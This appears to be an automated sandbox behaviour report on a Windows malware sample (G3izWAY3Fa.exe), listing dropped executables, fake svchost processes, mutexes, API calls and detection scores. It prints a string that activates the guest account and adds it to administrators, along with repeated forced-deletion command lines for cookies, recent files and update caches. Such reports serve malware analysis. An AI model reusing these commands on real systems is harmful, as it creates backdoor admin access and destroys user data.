Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043A410 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,InitiateSystemShutdownA,	5_2_0043A410
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043A500 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	5_2_0043A500
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043AD30 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	5_2_0043AD30
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043ADF0 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	5_2_0043ADF0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10011F80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,	8_2_10011F80

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

Code function: 0_2_004041CD GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004041CD

Source: C:\Windows\Temp\server.exe

3_2_100018A0

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

Code function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,

0_2_00402020

Source: C:\Windows\Temp\v5.exe

Code function: 2_2_00405244 LoadLibraryA,6D0C6DE0,FindResourceA,LoadResource,LockResource,wsprintfA,WriteFile,WriteFile,SetFilePointer,lstrlen,WriteFile,CloseHandle,

2_2_00405244

Source: C:\Windows\Temp\v5.exe

Code function: 2_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess,

2_2_0040597D

Source: C:\Windows\Temp\v5.exe	Code function: 2_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess,		2_2_0040597D
Source: C:\Windows\Temp\v5.exe	Code function: 4_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess,		4_2_0040597D

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2376:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
Source: C:\Windows\SysWOW64\033726\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\AAAAAA9PT0vfT4rqenp70A/Pqpp6+vr58= BBBBBB9PT0vf4Fr7K0sr0A/Pqpp6+vr58= CCCCCC9PT0vQXpr7K0sr0A/Pqpp6+vr58= GGGGGG4wIF/vL7858= XXXXXX579E5A5B VVVVVVrr2unw==
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2524:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:604:120:WilError_03
Source: C:\Windows\Temp\server.exe	Mutant created: \Sessions\1\BaseNamedObjects\AAAAAArrGvvbOnvbCzvbGwsKmnr6+vnw==
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6908:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7224:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
Source: C:\Windows\Temp\v5.exe	Mutant created: \BaseNamedObjects\Defghi Klmnopqr Tuv
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:660:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2440:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1044:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3736:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2148:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3280:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5764:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7232:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1380:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

File created: C:\Users\user\AppData\Local\Temp\nswC4F8.tmp

Jump to behavior

Source: G3izWAY3Fa.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: G3izWAY3Fa.exe	Virustotal: Detection: 70%
Source: G3izWAY3Fa.exe	ReversingLabs: Detection: 86%

Source: server.exe	String found in binary or memory: cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add
Source: svchost.exe	String found in binary or memory: cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

File read: C:\Users\user\Desktop\G3izWAY3Fa.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\G3izWAY3Fa.exe "C:\Users\user\Desktop\G3izWAY3Fa.exe"
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\v5.exe "C:\Windows\temp\v5.exe"
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\server.exe "C:\Windows\temp\server.exe"
Source: unknown	Process created: C:\Windows\Temp\v5.exe C:\Windows\temp\v5.exe
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\ .exe "C:\Windows\temp\ .exe"
Source: C:\Windows\Temp\v5.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\server.exe	Process created: C:\Windows\SysWOW64\033726\svchost.exe "C:\Windows\system32\033726\svchost.exe"
Source: C:\Windows\SysWOW64\033726\svchost.exe	Process created: C:\Windows\SysWOW64\034031\svchost.exe "C:\Windows\system32\034031\svchost.exe"
Source: unknown	Process created: C:\Windows\XXXXXX05CA35CC\svchsot.exe "C:\Windows\XXXXXX05CA35CC\svchsot.exe"
Source: unknown	Process created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe "C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe"
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\v5.exe "C:\Windows\temp\v5.exe"	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\server.exe "C:\Windows\temp\server.exe"	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\ .exe "C:\Windows\temp\ .exe"	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul	Jump to behavior
Source: C:\Windows\Temp\server.exe	Process created: C:\Windows\SysWOW64\033726\svchost.exe "C:\Windows\system32\033726\svchost.exe"	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe	Process created: C:\Windows\SysWOW64\034031\svchost.exe "C:\Windows\system32\034031\svchost.exe"

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: urlmon.dll	Jump to behavior
